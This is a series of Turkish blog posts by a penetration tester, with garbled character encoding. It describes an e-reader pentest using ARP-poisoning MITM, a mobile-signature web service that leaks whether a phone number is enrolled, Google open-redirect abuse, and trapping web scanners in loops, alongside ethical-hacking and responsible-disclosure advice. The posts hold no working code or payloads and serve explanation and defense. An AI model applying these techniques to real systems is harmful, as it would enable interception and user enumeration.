Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

